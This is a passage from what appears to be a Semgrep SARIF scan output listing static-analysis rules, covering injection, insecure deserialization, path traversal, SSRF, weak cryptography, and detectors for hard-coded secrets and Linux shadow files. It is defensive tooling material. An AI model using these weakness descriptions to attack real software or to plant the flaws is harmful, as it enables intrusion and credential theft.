`arn:aws:iam:::root`.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/json.aws.security.wildcard-assume-role.wildcard-assume-role)\n - [https://rhinosecuritylabs.com/aws/assume-worst-aws-assume-role-enumeration/](https://rhinosecuritylabs.com/aws/assume-worst-aws-assume-role-enumeration/)\n","text":"Detected wildcard access granted to sts:AssumeRole. This means anyone with your AWS account ID and the name of the role can assume the role. Instead, limit to a specific identity in your account, like this: `arn:aws:iam:::root`."},"helpUri":"https://semgrep.dev/r/json.aws.security.wildcard-assume-role.wildcard-assume-role","id":"json.aws.security.wildcard-assume-role.wildcard-assume-role","name":"json.aws.security.wildcard-assume-role.wildcard-assume-role","properties":{"precision":"very-high","tags":["CWE-250: Execution with Unnecessary Privileges","MEDIUM CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","OWASP-A06:2017 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: json.aws.security.wildcard-assume-role.wildcard-assume-role"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `dill` module allows arbitrary user defined classes and functions to be serialized. We do not recommend using it for unpickling data from untrusted sources. For deserializing data from untrusted sources we recommend using YAML or JSON libraries with built-in protections."},"help":{"markdown":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `dill` module allows arbitrary user defined classes and functions to be serialized. We do not recommend using it for unpickling data from untrusted sources. For deserializing data from untrusted sources we recommend using YAML or JSON libraries with built-in protections.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.django.deserialization.tainted-dill-django.tainted-dill-django)\n - [https://davidhamann.de/2020/04/05/exploiting-python-pickle/](https://davidhamann.de/2020/04/05/exploiting-python-pickle/)\n - [https://dill.readthedocs.io/en/latest/index.html](https://dill.readthedocs.io/en/latest/index.html)\n - [https://docs.python.org/3/library/pickle.html](https://docs.python.org/3/library/pickle.html)\n - [https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures](https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures)\n - [https://portswigger.net/web-security/deserialization](https://portswigger.net/web-security/deserialization)\n - [https://pypi.org/project/dill/](https://pypi.org/project/dill/)\n","text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `dill` module allows arbitrary user defined classes and functions to be serialized. We do not recommend using it for unpickling data from untrusted sources. For deserializing data from untrusted sources we recommend using YAML or JSON libraries with built-in protections."},"helpUri":"https://semgrep.dev/r/python.django.deserialization.tainted-dill-django.tainted-dill-django","id":"python.django.deserialization.tainted-dill-django.tainted-dill-django","name":"python.django.deserialization.tainted-dill-django.tainted-dill-django","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","HIGH CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.django.deserialization.tainted-dill-django.tainted-dill-django"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Access-Control-Allow-Origin response header is set to \"*\". This will disable CORS Same Origin Policy restrictions."},"help":{"markdown":"Access-Control-Allow-Origin response header is set to \"*\". This will disable CORS Same Origin Policy restrictions.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/php.lang.security.php-permissive-cors.php-permissive-cors)\n - [https://developer.mozilla.org/ru/docs/Web/HTTP/Headers/Access-Control-Allow-Origin](https://developer.mozilla.org/ru/docs/Web/HTTP/Headers/Access-Control-Allow-Origin)\n","text":"Access-Control-Allow-Origin response header is set to \"*\". This will disable CORS Same Origin Policy restrictions."},"helpUri":"https://semgrep.dev/r/php.lang.security.php-permissive-cors.php-permissive-cors","id":"php.lang.security.php-permissive-cors.php-permissive-cors","name":"php.lang.security.php-permissive-cors.php-permissive-cors","properties":{"precision":"very-high","tags":["CWE-346: Origin Validation Error","LOW CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: php.lang.security.php-permissive-cors.php-permissive-cors"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Missing mutex unlock (`$T` variable) before returning from a function. This could result in panics resulting from double lock operations"},"help":{"markdown":"Missing mutex unlock (`$T` variable) before returning from a function. This could result in panics resulting from double lock operations\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/trailofbits.go.missing-unlock-before-return.missing-unlock-before-return)\n - [https://pkg.go.dev/sync#Mutex](https://pkg.go.dev/sync#Mutex)\n - [https://blog.trailofbits.com/2020/06/09/how-to-check-if-a-mutex-is-locked-in-go/](https://blog.trailofbits.com/2020/06/09/how-to-check-if-a-mutex-is-locked-in-go/)\n","text":"Missing mutex unlock (`$T` variable) before returning from a function. This could result in panics resulting from double lock operations"},"helpUri":"https://semgrep.dev/r/trailofbits.go.missing-unlock-before-return.missing-unlock-before-return","id":"trailofbits.go.missing-unlock-before-return.missing-unlock-before-return","name":"trailofbits.go.missing-unlock-before-return.missing-unlock-before-return","properties":{"precision":"very-high","tags":["CWE-667: Improper Locking","MEDIUM CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: trailofbits.go.missing-unlock-before-return.missing-unlock-before-return"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. Don’t manually concatenate values to a query, use SQLBuilder instead to avoid SQL injection."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. Don’t manually concatenate values to a query, use SQLBuilder instead to avoid SQL injection.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.db.sqlobject-flask.sqlobject-flask)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n - [https://sqlobject.org/SQLBuilder.html](https://sqlobject.org/SQLBuilder.html)\n - [https://sqlobject.org/SQLObject.html](https://sqlobject.org/SQLObject.html)\n","text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. Don’t manually concatenate values to a query, use SQLBuilder instead to avoid SQL injection."},"helpUri":"https://semgrep.dev/r/python.flask.db.sqlobject-flask.sqlobject-flask","id":"python.flask.db.sqlobject-flask.sqlobject-flask","name":"python.flask.db.sqlobject-flask.sqlobject-flask","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.db.sqlobject-flask.sqlobject-flask"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Make sure that unverified user data can not reach `sandbox`."},"help":{"markdown":"Make sure that unverified user data can not reach `sandbox`.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.sandbox.security.audit.sandbox-code-injection.sandbox-code-injection)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Make sure that unverified user data can not reach `sandbox`."},"helpUri":"https://semgrep.dev/r/javascript.sandbox.security.audit.sandbox-code-injection.sandbox-code-injection","id":"javascript.sandbox.security.audit.sandbox-code-injection.sandbox-code-injection","name":"javascript.sandbox.security.audit.sandbox-code-injection.sandbox-code-injection","properties":{"precision":"very-high","tags":["CWE-94: Improper Control of Generation of Code ('Code Injection')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.sandbox.security.audit.sandbox-code-injection.sandbox-code-injection"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Untrusted user input in {url: ...} can result in Open Redirect vulnerability."},"help":{"markdown":"Untrusted user input in {url: ...} can result in Open Redirect vulnerability.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/typescript.nestjs.security.audit.nestjs-open-redirect.nestjs-open-redirect)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control)\n","text":"Untrusted user input in {url: ...} can result in Open Redirect vulnerability."},"helpUri":"https://semgrep.dev/r/typescript.nestjs.security.audit.nestjs-open-redirect.nestjs-open-redirect","id":"typescript.nestjs.security.audit.nestjs-open-redirect.nestjs-open-redirect","name":"typescript.nestjs.security.audit.nestjs-open-redirect.nestjs-open-redirect","properties":{"precision":"very-high","tags":["CWE-601: URL Redirection to Untrusted Site ('Open Redirect')","LOW CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: typescript.nestjs.security.audit.nestjs-open-redirect.nestjs-open-redirect"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Generic Secret detected"},"help":{"markdown":"Generic Secret detected\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/generic.secrets.security.detected-generic-secret.detected-generic-secret)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"Generic Secret detected"},"helpUri":"https://semgrep.dev/r/generic.secrets.security.detected-generic-secret.detected-generic-secret","id":"generic.secrets.security.detected-generic-secret.detected-generic-secret","name":"generic.secrets.security.detected-generic-secret.detected-generic-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","LOW CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: generic.secrets.security.detected-generic-secret.detected-generic-secret"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"Detected a cookie where the `Secure` flag is either missing or disabled. The `Secure` cookie flag instructs the browser to forbid sending the cookie over an insecure HTTP request. Set the `Secure` flag to `true` so the cookie will only be sent over HTTPS. If this wasn't intentional, it's recommended to set the Secure flag to true so the cookie will always be sent over HTTPS. A secure default approach would consist of creating a custom response class, overriding the `set_cookie` method to set this flag to `True` by default, setting the `response_class` attribute of your Flask app to use the custom response class, setting the flag to False on a case-by-case basis only when necessary."},"help":{"markdown":"Detected a cookie where the `Secure` flag is either missing or disabled. The `Secure` cookie flag instructs the browser to forbid sending the cookie over an insecure HTTP request. Set the `Secure` flag to `true` so the cookie will only be sent over HTTPS. If this wasn't intentional, it's recommended to set the Secure flag to true so the cookie will always be sent over HTTPS. A secure default approach would consist of creating a custom response class, overriding the `set_cookie` method to set this flag to `True` by default, setting the `response_class` attribute of your Flask app to use the custom response class, setting the flag to False on a case-by-case basis only when necessary.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.web.flask-cookie-secure-false.flask-cookie-secure-false)\n - [https://owasp.org/Top10/A05_2021-Security_Misconfiguration](https://owasp.org/Top10/A05_2021-Security_Misconfiguration)\n","text":"Detected a cookie where the `Secure` flag is either missing or disabled. The `Secure` cookie flag instructs the browser to forbid sending the cookie over an insecure HTTP request. Set the `Secure` flag to `true` so the cookie will only be sent over HTTPS. If this wasn't intentional, it's recommended to set the Secure flag to true so the cookie will always be sent over HTTPS. A secure default approach would consist of creating a custom response class, overriding the `set_cookie` method to set this flag to `True` by default, setting the `response_class` attribute of your Flask app to use the custom response class, setting the flag to False on a case-by-case basis only when necessary."},"helpUri":"https://semgrep.dev/r/python.flask.web.flask-cookie-secure-false.flask-cookie-secure-false","id":"python.flask.web.flask-cookie-secure-false.flask-cookie-secure-false","name":"python.flask.web.flask-cookie-secure-false.flask-cookie-secure-false","properties":{"precision":"very-high","tags":["CWE-614: Sensitive Cookie in HTTPS Session Without 'Secure' Attribute","HIGH CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.web.flask-cookie-secure-false.flask-cookie-secure-false"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a NoSQL injection vulnerability. An attacker can execute malicious NoSQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. Make sure all user input is validated and sanitized, and avoid using tainted user input to construct NoSQL statements if possible. Ideally, avoid raw queries and instead use parameterized queries."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a NoSQL injection vulnerability. An attacker can execute malicious NoSQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. Make sure all user input is validated and sanitized, and avoid using tainted user input to construct NoSQL statements if possible. Ideally, avoid raw queries and instead use parameterized queries.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/csharp.dotnet-core.nosqli.mongodb-taint-grpc.mongodb-taint-grpc)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input might be used to build a database query, which can lead to a NoSQL injection vulnerability. An attacker can execute malicious NoSQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. Make sure all user input is validated and sanitized, and avoid using tainted user input to construct NoSQL statements if possible. Ideally, avoid raw queries and instead use parameterized queries."},"helpUri":"https://semgrep.dev/r/csharp.dotnet-core.nosqli.mongodb-taint-grpc.mongodb-taint-grpc","id":"csharp.dotnet-core.nosqli.mongodb-taint-grpc.mongodb-taint-grpc","name":"csharp.dotnet-core.nosqli.mongodb-taint-grpc.mongodb-taint-grpc","properties":{"precision":"very-high","tags":["CWE-943: Improper Neutralization of Special Elements in Data Query Logic","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: csharp.dotnet-core.nosqli.mongodb-taint-grpc.mongodb-taint-grpc"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"If unverified user data can reach the `phantom` page methods it can result in Server-Side Request Forgery vulnerabilities"},"help":{"markdown":"If unverified user data can reach the `phantom` page methods it can result in Server-Side Request Forgery vulnerabilities\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.phantom.security.audit.phantom-injection.phantom-injection)\n - [https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29](https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29)\n","text":"If unverified user data can reach the `phantom` page methods it can result in Server-Side Request Forgery vulnerabilities"},"helpUri":"https://semgrep.dev/r/javascript.phantom.security.audit.phantom-injection.phantom-injection","id":"javascript.phantom.security.audit.phantom-injection.phantom-injection","name":"javascript.phantom.security.audit.phantom-injection.phantom-injection","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","LOW CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.phantom.security.audit.phantom-injection.phantom-injection"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In FastAPI apps, consider using the Starlette `:path` annotation in the route declaration to automatically sanitize paths and filenames."},"help":{"markdown":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In FastAPI apps, consider using the Starlette `:path` annotation in the route declaration to automatically sanitize paths and filenames.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.fastapi.file.tainted-shelve-fastapi.tainted-shelve-fastapi)\n - [https://fastapi.palletsprojects.com/en/2.3.x/patterns/fileuploads/](https://fastapi.palletsprojects.com/en/2.3.x/patterns/fileuploads/)\n - [https://fastapi.tiangolo.com/tutorial/path-params/#path-parameters-containing-paths](https://fastapi.tiangolo.com/tutorial/path-params/#path-parameters-containing-paths)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control)\n - [https://owasp.org/www-community/attacks/Path_Traversal](https://owasp.org/www-community/attacks/Path_Traversal)\n - [https://portswigger.net/web-security/file-path-traversal](https://portswigger.net/web-security/file-path-traversal)\n - [https://werkzeug.palletsprojects.com/en/3.0.x/utils/#werkzeug.utils.secure_filename](https://werkzeug.palletsprojects.com/en/3.0.x/utils/#werkzeug.utils.secure_filename)\n","text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In FastAPI apps, consider using the Starlette `:path` annotation in the route declaration to automatically sanitize paths and filenames."},"helpUri":"https://semgrep.dev/r/python.fastapi.file.tainted-shelve-fastapi.tainted-shelve-fastapi","id":"python.fastapi.file.tainted-shelve-fastapi.tainted-shelve-fastapi","name":"python.fastapi.file.tainted-shelve-fastapi.tainted-shelve-fastapi","properties":{"precision":"very-high","tags":["CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')","HIGH CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A05:2017 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: python.fastapi.file.tainted-shelve-fastapi.tainted-shelve-fastapi"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The function `$FUN` does not impose any size limitation to what it writes to `$BUF`. That may lead to a stack buffer overflow if there is no validation on the size of the input."},"help":{"markdown":"The function `$FUN` does not impose any size limitation to what it writes to `$BUF`. That may lead to a stack buffer overflow if there is no validation on the size of the input.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/cpp.lang.security.strings.unbounded-copy-to-stack-buffer.unbounded-copy-to-stack-buffer)\n - [https://wiki.sei.cmu.edu/confluence/display/c/STR31-C.+Guarantee+that+storage+for+strings+has+sufficient+space+for+character+data+and+the+null+terminator](https://wiki.sei.cmu.edu/confluence/display/c/STR31-C.+Guarantee+that+storage+for+strings+has+sufficient+space+for+character+data+and+the+null+terminator)\n","text":"The function `$FUN` does not impose any size limitation to what it writes to `$BUF`. That may lead to a stack buffer overflow if there is no validation on the size of the input."},"helpUri":"https://semgrep.dev/r/cpp.lang.security.strings.unbounded-copy-to-stack-buffer.unbounded-copy-to-stack-buffer","id":"cpp.lang.security.strings.unbounded-copy-to-stack-buffer.unbounded-copy-to-stack-buffer","name":"cpp.lang.security.strings.unbounded-copy-to-stack-buffer.unbounded-copy-to-stack-buffer","properties":{"precision":"very-high","tags":["CWE-120: Buffer Copy without Checking Size of Input ('Classic Buffer Overflow')","MEDIUM CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: cpp.lang.security.strings.unbounded-copy-to-stack-buffer.unbounded-copy-to-stack-buffer"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected a formatted string in a SQL statement. This could lead to SQL injection if variables in the SQL statement are not properly sanitized. Avoid using `#$variable` and use `$variable` in `sql\"...\"` strings instead."},"help":{"markdown":"Detected a formatted string in a SQL statement. This could lead to SQL injection if variables in the SQL statement are not properly sanitized. Avoid using `#$variable` and use `$variable` in `sql\"...\"` strings instead.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/scala.slick.security.scala-slick-sql-non-literal.scala-slick-sql-non-literal)\n - [https://scala-slick.org/doc/3.3.3/sql.html#splicing-literal-values](https://scala-slick.org/doc/3.3.3/sql.html#splicing-literal-values)\n","text":"Detected a formatted string in a SQL statement. This could lead to SQL injection if variables in the SQL statement are not properly sanitized. Avoid using `#$variable` and use `$variable` in `sql\"...\"` strings instead."},"helpUri":"https://semgrep.dev/r/scala.slick.security.scala-slick-sql-non-literal.scala-slick-sql-non-literal","id":"scala.slick.security.scala-slick-sql-non-literal.scala-slick-sql-non-literal","name":"scala.slick.security.scala-slick-sql-non-literal.scala-slick-sql-non-literal","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","LOW CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: scala.slick.security.scala-slick-sql-non-literal.scala-slick-sql-non-literal"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build an LDAP query, which can allow attackers to run arbitrary LDAP queries. If an LDAP query must contain untrusted input then it must be escaped."},"help":{"markdown":"Untrusted input might be used to build an LDAP query, which can allow attackers to run arbitrary LDAP queries. If an LDAP query must contain untrusted input then it must be escaped.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/cpp.lang.security.ldap.ldap-injection-dn.ldap-injection-dn)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n - [https://wiki.sei.cmu.edu/confluence/display/c/STR02-C.+Sanitize+data+passed+to+complex+subsystems](https://wiki.sei.cmu.edu/confluence/display/c/STR02-C.+Sanitize+data+passed+to+complex+subsystems)\n","text":"Untrusted input might be used to build an LDAP query, which can allow attackers to run arbitrary LDAP queries. If an LDAP query must contain untrusted input then it must be escaped."},"helpUri":"https://semgrep.dev/r/cpp.lang.security.ldap.ldap-injection-dn.ldap-injection-dn","id":"cpp.lang.security.ldap.ldap-injection-dn.ldap-injection-dn","name":"cpp.lang.security.ldap.ldap-injection-dn.ldap-injection-dn","properties":{"precision":"very-high","tags":["CWE-90: Improper Neutralization of Special Elements used in an LDAP Query ('LDAP Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: cpp.lang.security.ldap.ldap-injection-dn.ldap-injection-dn"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. A number of functions and packages in the `torch` module rely on the `pickle` module and should not be used to unpackage data from untrusted sources."},"help":{"markdown":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. A number of functions and packages in the `torch` module rely on the `pickle` module and should not be used to unpackage data from untrusted sources.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.deserialization.tainted-torch-pickle-flask.tainted-torch-pickle-flask)\n - [https://blog.trailofbits.com/2021/03/15/never-a-dill-moment-exploiting-machine-learning-pickle-files/](https://blog.trailofbits.com/2021/03/15/never-a-dill-moment-exploiting-machine-learning-pickle-files/)\n - [https://davidhamann.de/2020/04/05/exploiting-python-pickle/;](https://davidhamann.de/2020/04/05/exploiting-python-pickle/;)\n - [https://docs.python.org/3/library/pickle.html](https://docs.python.org/3/library/pickle.html)\n - [https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures](https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures)\n - [https://portswigger.net/web-security/deserialization](https://portswigger.net/web-security/deserialization)\n - [https://pytorch.org/docs/stable/_modules/torch/distributed/distributed_c10d.html#broadcast_object_list:~:text=.BytesIO()-,_pickler,-(f)](https://pytorch.org/docs/stable/_modules/torch/distributed/distributed_c10d.html#broadcast_object_list:~:text=.BytesIO()-,_pickler,-(f))\n - [https://pytorch.org/docs/stable/generated/torch.load.html](https://pytorch.org/docs/stable/generated/torch.load.html)\n","text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. A number of functions and packages in the `torch` module rely on the `pickle` module and should not be used to unpackage data from untrusted sources."},"helpUri":"https://semgrep.dev/r/python.flask.deserialization.tainted-torch-pickle-flask.tainted-torch-pickle-flask","id":"python.flask.deserialization.tainted-torch-pickle-flask.tainted-torch-pickle-flask","name":"python.flask.deserialization.tainted-torch-pickle-flask.tainted-torch-pickle-flask","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","HIGH CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.deserialization.tainted-torch-pickle-flask.tainted-torch-pickle-flask"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"linux shadow file detected"},"help":{"markdown":"linux shadow file detected\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/generic.secrets.security.detected-etc-shadow.detected-etc-shadow)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"linux shadow file detected"},"helpUri":"https://semgrep.dev/r/generic.secrets.security.detected-etc-shadow.detected-etc-shadow","id":"generic.secrets.security.detected-etc-shadow.detected-etc-shadow","name":"generic.secrets.security.detected-etc-shadow.detected-etc-shadow","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","LOW CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: generic.secrets.security.detected-etc-shadow.detected-etc-shadow"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Use of Blowfish was detected. Blowfish uses a 64-bit block size that makes it vulnerable to birthday attacks, and is therefore considered non-compliant. Instead, use a strong, secure cipher: Cipher.getInstance(\"AES/CBC/PKCS7PADDING\"). See https://owasp.org/www-community/Using_the_Java_Cryptographic_Extensions for more information."},"help":{"markdown":"Use of Blowfish was detected. Blowfish uses a 64-bit block size that makes it vulnerable to birthday attacks, and is therefore considered non-compliant. Instead, use a strong, secure cipher: Cipher.getInstance(\"AES/CBC/PKCS7PADDING\"). See https://owasp.org/www-community/Using_the_Java_Cryptographic_Extensions for more information.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.audit.crypto.use-of-blowfish.use-of-blowfish)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n - [https://googleprojectzero.blogspot.com/2022/10/rc4-is-still-considered-harmful.html](https://googleprojectzero.blogspot.com/2022/10/rc4-is-still-considered-harmful.html)\n","text":"Use of Blowfish was detected. Blowfish uses a 64-bit block size that makes it vulnerable to birthday attacks, and is therefore considered non-compliant. Instead, use a strong, secure cipher: Cipher.getInstance(\"AES/CBC/PKCS7PADDING\"). See https://owasp.org/www-community/Using_the_Java_Cryptographic_Extensions for more information."},"helpUri":"https://semgrep.dev/r/java.lang.security.audit.crypto.use-of-blowfish.use-of-blowfish","id":"java.lang.security.audit.crypto.use-of-blowfish.use-of-blowfish","name":"java.lang.security.audit.crypto.use-of-blowfish.use-of-blowfish","properties":{"precision":"very-high","tags":["CWE-327: Use of a Broken or Risky Cryptographic Algorithm","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.audit.crypto.use-of-blowfish.use-of-blowfish"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"CodeClimate detected"},"help":{"markdown":"CodeClimate detected\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/generic.secrets.security.detected-codeclimate.detected-codeclimate)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"CodeClimate detected"},"helpUri":"https://semgrep.dev/r/generic.secrets.security.detected-codeclimate.detected-codeclimate","id":"generic.secrets.security.detected-codeclimate.detected-codeclimate","name":"generic.secrets.security.detected-codeclimate.detected-codeclimate","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","LOW CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: generic.secrets.security.detected-codeclimate.detected-codeclimate"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Use of RSA-$BITS, which is considered weak. Based on NIST standards, RSA keys should be at least 2048 bits."},"help":{"markdown":"Use of RSA-$BITS, which is considered weak. Based on NIST standards, RSA keys should be at least 2048 bits.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/typescript.typescript.node.security.node-rsa-weak-key.node-rsa-weak-key)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#algorithms](https://cheatsheetseries.owasp.org/cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#algorithms)\n","text":"Use of RSA-$BITS, which is considered weak. Based on NIST standards, RSA keys should be at least 2048 bits."},"helpUri":"https://semgrep.dev/r/typescript.typescript.node.security.node-rsa-weak-key.node-rsa-weak-key","id":"typescript.typescript.node.security.node-rsa-weak-key.node-rsa-weak-key","name":"typescript.typescript.node.security.node-rsa-weak-key.node-rsa-weak-key","properties":{"precision":"very-high","tags":["CWE-326: Inadequate Encryption Strength","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic 